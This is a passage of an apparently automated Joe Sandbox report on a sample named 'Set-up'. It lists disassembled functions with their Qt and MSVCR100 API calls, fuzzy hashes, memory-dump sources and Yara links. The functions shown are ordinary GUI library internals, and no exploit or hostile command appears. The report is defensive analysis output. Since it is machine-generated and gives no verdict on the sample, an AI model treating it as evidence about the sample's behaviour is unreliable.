Instruction ID: 76fa8e4ec997dfe879e620d4c48cf30fa3c52400e3501acb84143235db3d2d20
Opcode Fuzzy Hash: fe2ffc1e875153ed42362cf840f71d0bae7eaa7535d80b0e2a0afa066178335b
Instruction Fuzzy Hash: 7421A275604352CFD710CF29D444B1ABBE5FB89B64F100A2DE4658B3D0E7789604CBD2

Function 6C0CBB60 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000140,B6508C7A), ref: 6C0CBB90
??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0CBBAC

Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
Part of subcall function 6BC1DEC0: ??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
Part of subcall function 6BC1DEC0: ??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

??0QRectF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0CBBC2
??0QGraphicsItem@@IAE@AAVQGraphicsItemPrivate@@PAV0@PAVQGraphicsScene@@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0CBBE1
?updateAncestorFlag@QGraphicsItemPrivate@@QAEXW4GraphicsItemFlag@QGraphicsItem@@W4AncestorFlag@1@_N2@Z.QTGUI4(000000FF,00000000,00000000,00000001,00000000,?,?), ref: 6C0CBC15

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Graphics$?ref@AtomicBasicInt@@$Item$Private@@Rect$AncestorFlag@Item@@$??2@?updateFlag@1@_PointScene@@@Transform@@
String ID:
API String ID: 1575866662-0
Opcode ID: 18e3ce15ae7b69eef7408245c727d84ca1baabef2518884b114ebe66a59b7963
Instruction ID: 0465a5c03dcd7ee98e9b29169d0060f0e042d2d5f4da471f736b6fc9c142ac0d
Opcode Fuzzy Hash: 18e3ce15ae7b69eef7408245c727d84ca1baabef2518884b114ebe66a59b7963
Instruction Fuzzy Hash: 7111CD722087019FD314CF19C845B5ABBE5EF94B24F104A2EF4A5977D0DBB4A909CBA2

Function 6C0ED790 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000058,B6508C7A,?,?,?,?,?,6C1A7713,000000FF,6BC139E7,00000000), ref: 6C0ED7B8
??0QPointF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED7E4
??0QPointF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED7ED
??0QPoint@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED7F6
??0QEvent@@QAE@W4Type@0@@Z.QTCORE4(?,?,?,?,?,?,?,?,?,00000000), ref: 6C0ED81E

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$??2@Event@@Point@@Type@0@@
String ID:
API String ID: 3966387013-0
Opcode ID: 7d4d4e8e33f39b7bfdfe686ccdaaead7778cf186495f18696a49410c562b79af
Instruction ID: cf693ae422a246f9a487fdc34497f84883a5ee72eacdd131d35bbd0d062a01ce
Opcode Fuzzy Hash: 7d4d4e8e33f39b7bfdfe686ccdaaead7778cf186495f18696a49410c562b79af
Instruction Fuzzy Hash: 4F214AB16047528FD720CF9AC58465AFBF8FF49724F108A2EE4A683B50D774A905CF91

Function 6C0ED360 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000048,B6508C7A,?,?,?,?,?,6C1A7713,000000FF,6BC139A7,00000000), ref: 6C0ED388
??0QPointF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED3B4
??0QPointF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED3BD
??0QPoint@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED3C6
??0QEvent@@QAE@W4Type@0@@Z.QTCORE4(?,?,?,?,?,?,?,?,?,00000000), ref: 6C0ED3EF

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$??2@Event@@Point@@Type@0@@
String ID:
API String ID: 3966387013-0
Opcode ID: 9867231e96cb7c71546daf79c00e8fc644768a2c260ef9730e0fcfb6e02bc2e9
Instruction ID: e7bab067b6d77f313abbc6f22100ec321172c36a21a23bf34360e7c501487472
Opcode Fuzzy Hash: 9867231e96cb7c71546daf79c00e8fc644768a2c260ef9730e0fcfb6e02bc2e9
Instruction Fuzzy Hash: DA216AB26047558FC320CF59C54461AFBF8FF85B20F008A1EE4A683B90DBB1A505CB92

Function 6C0ED460 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000040,B6508C7A,?,?,?,?,?,6C1A7713,000000FF,6BC139B7,00000000), ref: 6C0ED488
??0QPointF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED4B4
??0QPointF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED4BD
??0QPoint@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED4C6
??0QEvent@@QAE@W4Type@0@@Z.QTCORE4(?,?,?,?,?,?,?,?,?,00000000), ref: 6C0ED4E9

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$??2@Event@@Point@@Type@0@@
String ID:
API String ID: 3966387013-0
Opcode ID: 573b6778907fa00a11c30937e5f994a1e3ed1a8bc84ebec9443ee23a8ed1f5e7
Instruction ID: ade146f69999fde32812fbdbf75e62017cc477d99fa0efc659b880f4e56ba106
Opcode Fuzzy Hash: 573b6778907fa00a11c30937e5f994a1e3ed1a8bc84ebec9443ee23a8ed1f5e7
Instruction Fuzzy Hash: CD117FB16047518FD320CF59C48565AFBF8FF49724F008A2EE4A683B50D774A905CB91

Function 6C0E6B50 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000008,B6508C7A,?,?,?,00000000,6C1A324B,000000FF,6BC13614,00000000,?,?,?,?,?,?), ref: 6C0E6B77
??0QGraphicsRectItem@@QAE@ABVQRectF@@PAVQGraphicsItem@@PAVQGraphicsScene@@@Z.QTGUI4(?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 6C0E6B96

Part of subcall function 6C0CB0A0: ??2@YAPAXI@Z.MSVCR100(00000168,B6508C7A,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 6C0CB0CF
Part of subcall function 6C0CB0A0: ??0QGraphicsItem@@IAE@AAVQGraphicsItemPrivate@@PAV0@PAVQGraphicsScene@@@Z.QTGUI4(00000000,?,?), ref: 6C0CB107
Part of subcall function 6C0CB0A0: ?setRect@QGraphicsRectItem@@QAEXABVQRectF@@@Z.QTGUI4(?,00000000,?,?), ref: 6C0CB121

?setPen@QAbstractGraphicsShapeItem@@QAEXABVQPen@@@Z.QTGUI4 ref: 6C0E6BAC
?setBrush@QAbstractGraphicsShapeItem@@QAEXABVQBrush@@@Z.QTGUI4(?), ref: 6C0E6BB8
?addItem@QGraphicsScene@@QAEXPAVQGraphicsItem@@@Z.QTGUI4(00000000,?), ref: 6C0E6BC0

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Graphics$Item@@$Rect$?set$??2@AbstractScene@@@Shape$?addBrush@Brush@@@F@@@ItemItem@Item@@@Pen@Pen@@@Private@@Rect@Scene@@
String ID:
API String ID: 1194137280-0
Opcode ID: 560fbb207ebf79d97c5dcf6bf063811022dfc5e66099bca1663929bbc8248b9c
Instruction ID: e6588e8c9abb765822669df01fae51e9a6bf56e94de63992b28c4754fb9b703b
Opcode Fuzzy Hash: 560fbb207ebf79d97c5dcf6bf063811022dfc5e66099bca1663929bbc8248b9c
Instruction Fuzzy Hash: 50019272704650AFC204CB599844B6FB7E8FBC9A24F104A1EF165C3780EB74E9058BE2

Function 6C0CB7C0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000148,B6508C7A,?,?,?,?,6C1A52A3,000000FF,6BC12FB9,00000000,00000000), ref: 6C0CB7EA
??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4(?,?,?,?,?,?,?,00000000), ref: 6C0CB806

Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
Part of subcall function 6BC1DEC0: ??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
Part of subcall function 6BC1DEC0: ??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

??0QLineF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,00000000), ref: 6C0CB81C
??0QPen@@QAE@XZ.QTGUI4(?,?,?,?,?,?,?,00000000), ref: 6C0CB828
??0QGraphicsItem@@IAE@AAVQGraphicsItemPrivate@@PAV0@PAVQGraphicsScene@@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0CB846

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?ref@AtomicBasicInt@@$Graphics$ItemPrivate@@Rect$??2@Item@@LinePen@@PointScene@@@Transform@@
String ID:
API String ID: 890976561-0
Opcode ID: b7755ef9ee9c70e36347bf847916248b42784cc4ddef15d37df2490fa71ba16d
Instruction ID: 0486e031a977fcd6788bbc0720146ced196a8309aadfeea5b1ad9698ab12d54e
Opcode Fuzzy Hash: b7755ef9ee9c70e36347bf847916248b42784cc4ddef15d37df2490fa71ba16d
Instruction Fuzzy Hash: F911A5B26087519FD314DF18C845B9FB7E8FF99724F000A1EE45583790DB74A905CBA2

Function 6BC1B6D0 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

?size@QListData@@QBEHXZ.QTCORE4(?,?,00800000,?,6C0C6613,?,00000002,B6508C7A,00000000,?,B6508C7A), ref: 6BC1B6DF
?at@QListData@@QBEPAPAXH@Z.QTCORE4(00000000,?,00800000,?,6C0C6613,?,00000002,B6508C7A,00000000,?,B6508C7A), ref: 6BC1B6F3
?size@QListData@@QBEHXZ.QTCORE4(?,00800000,?,6C0C6613,?,00000002,B6508C7A,00000000,?,B6508C7A), ref: 6BC1B702
??0QVariant@@QAE@XZ.QTCORE4(?,00800000,?,6C0C6613,?,00000002,B6508C7A,00000000,?,B6508C7A), ref: 6BC1B712
??0QVariant@@QAE@ABV0@@Z.QTCORE4(?,?,00800000,?,6C0C6613,?,00000002,B6508C7A,00000000,?,B6508C7A), ref: 6BC1B72B

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?size@Variant@@$?at@V0@@
String ID:
API String ID: 3656725575-0
Opcode ID: c32759a22f3d55728cf0b5d7c14d21b6d401bb5ee15de6be90bbb43b324dbada
Instruction ID: 33a723799d7a3db11e8ad885377de35e43c102df29f02b07de16f6f47d393bee
Opcode Fuzzy Hash: c32759a22f3d55728cf0b5d7c14d21b6d401bb5ee15de6be90bbb43b324dbada
Instruction Fuzzy Hash: C7F08C323181218F8A049FA9E84846EF7A9FF96662714805EF442E7350CB24AE16DBF1

Function 6C0C3710 Relevance: 7.5, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6C0C373B
?translated@QRectF@@QBE?AV1@ABVQPointF@@@Z.QTCORE4(?,?), ref: 6C0C3755
?transformToParent@QGraphicsItemPrivate@@QBE?AVQTransform@@XZ.QTGUI4(?,?,00000000,?,?), ref: 6C0C3783
?inverted@QTransform@@QBE?AV1@PA_N@Z.QTGUI4(?,?,00000000,?,?), ref: 6C0C378A
?mapRect@QTransform@@QBE?AVQRectF@@ABV2@@Z.QTGUI4(?,?,00000000,?,?), ref: 6C0C3791

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Transform@@$PointRect$?inverted@?map?transform?translated@F@@@GraphicsItemParent@Private@@Rect@V2@@
String ID:
API String ID: 111685645-0
Opcode ID: ee8f5f6dfc9d92cb3a5330e27244cf23448579c2af70bb026546b85567d13b88
Instruction ID: b5877a2d4fe5ad172cd47a45d98e1d6c1883b444b6ce55ae2f4c784e206650ee
Opcode Fuzzy Hash: ee8f5f6dfc9d92cb3a5330e27244cf23448579c2af70bb026546b85567d13b88
Instruction Fuzzy Hash: 68015A352043009BD724EB64D859BEFBBA9BF84758F00885DE49897280DB359929CBE3

Function 6BF9D4B0 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON

Download Yara Rule

APIs

??1QVariant@@QAE@XZ.QTCORE4(B6508C7A,?,?,00000000,6C1896FB,000000FF,6BFA408F), ref: 6BF9D4F8
??1QIcon@@QAE@XZ.QTGUI4 ref: 6BF9D506
??1QString@@QAE@XZ.QTCORE4 ref: 6BF9D513
??1QString@@QAE@XZ.QTCORE4 ref: 6BF9D521
??1QString@@QAE@XZ.QTCORE4 ref: 6BF9D532

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: String@@$Icon@@Variant@@
String ID:
API String ID: 2218914783-0
Opcode ID: e14269cd54ed4724dd9273cf8b8042b24b50a4c3cc2040dbfc1fdb32839a3b64
Instruction ID: 5732b727f508b97a8dedd65bc97cca411975de58dcf11d661abff1d2e951243f
Opcode Fuzzy Hash: e14269cd54ed4724dd9273cf8b8042b24b50a4c3cc2040dbfc1fdb32839a3b64
Instruction Fuzzy Hash: 74115A35108782CFE714CF68D558B5ABBE4FF49724F008A0DE89643790D774A608CBA2

Function 6BC14BE0 Relevance: 7.5, APIs: 5, Instructions: 37windowCOMMON

Download Yara Rule

APIs

??1QBrush@@QAE@XZ.QTGUI4(B6508C7A,?,?,?,6C1734D3,000000FF), ref: 6BC14C13
??1QString@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,6C1734D3,000000FF), ref: 6BC14C20
??1QIcon@@QAE@XZ.QTGUI4(?,?,?,6C1734D3,000000FF), ref: 6BC14C2E

Part of subcall function 6BCA1E70: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,6BC12505,?,00000000,?,?,?,00000000,?,?,?,B6508C7A,?,?,6C150988,000000FF), ref: 6BCA1E7C

??1QFontMetricsF@@QAE@XZ.QTGUI4(?,?,?,6C1734D3,000000FF), ref: 6BC14C46

Part of subcall function 6BDCA8C0: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,6BE6A917), ref: 6BDCA8C9
Part of subcall function 6BDCA8C0: ??1QFontPrivate@@QAE@XZ.QTGUI4 ref: 6BDCA8DB
Part of subcall function 6BDCA8C0: ??3@YAXPAX@Z.MSVCR100(?), ref: 6BDCA8E1

??1QStyleOption@@QAE@XZ.QTGUI4(?,?,?,6C1734D3,000000FF), ref: 6BC14C55

Part of subcall function 6BE6A5F0: ??1QPalette@@QAE@XZ.QTGUI4(B6508C7A,?,?,00000000,6C172C4B,??1QStyleOption@@QAE@XZ,6BC14815,?,?,?,6C148F84,000000FF), ref: 6BE6A623
Part of subcall function 6BE6A5F0: ??1QFontMetricsF@@QAE@XZ.QTGUI4(B6508C7A,?,?,00000000,6C172C4B,??1QStyleOption@@QAE@XZ,6BC14815,?,?,?,6C148F84,000000FF), ref: 6BE6A633

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Font$?deref@AtomicBasicInt@@Metrics$??3@Brush@@Icon@@Option@@Palette@@Private@@String@@Style
String ID:
API String ID: 279492534-0
Opcode ID: 6589064c6e570ad9028c9f52e411482d4593668c92585b4e1ada810cdd9e93db
Instruction ID: 7663f5a462b453df09aeb9358f543bd7441cc75f7e9a5f6d227b5f17a6fafe45
Opcode Fuzzy Hash: 6589064c6e570ad9028c9f52e411482d4593668c92585b4e1ada810cdd9e93db
Instruction Fuzzy Hash: CF014C71508B51CFD315CF28D54575BBBE4EB49B24F004A1EE4A683790EB74A608CBA2

Function 6C0BD8E0 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB458,?,?,?,?,?,?,00000000), ref: 6C0BD908

Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
Part of subcall function 6BC1DEC0: ??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
Part of subcall function 6BC1DEC0: ??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

??0QBrush@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB458,?,?,?,?,?,?,00000000), ref: 6C0BD921

Part of subcall function 6BD0D130: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,00000000,00000120,00000000,6C159C98,000000FF,6C0BD7E6,B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB058), ref: 6BD0D169

??0QPen@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB458,?,?,?,?,?,?,00000000), ref: 6C0BD931
??0QRectF@@QAE@XZ.QTCORE4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB458,?,?,?,?,?,?,00000000), ref: 6C0BD941
??0QRectF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A41AC,000000FF,6C0CB458,?,?,?,?,?,?,00000000), ref: 6C0BD95B

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

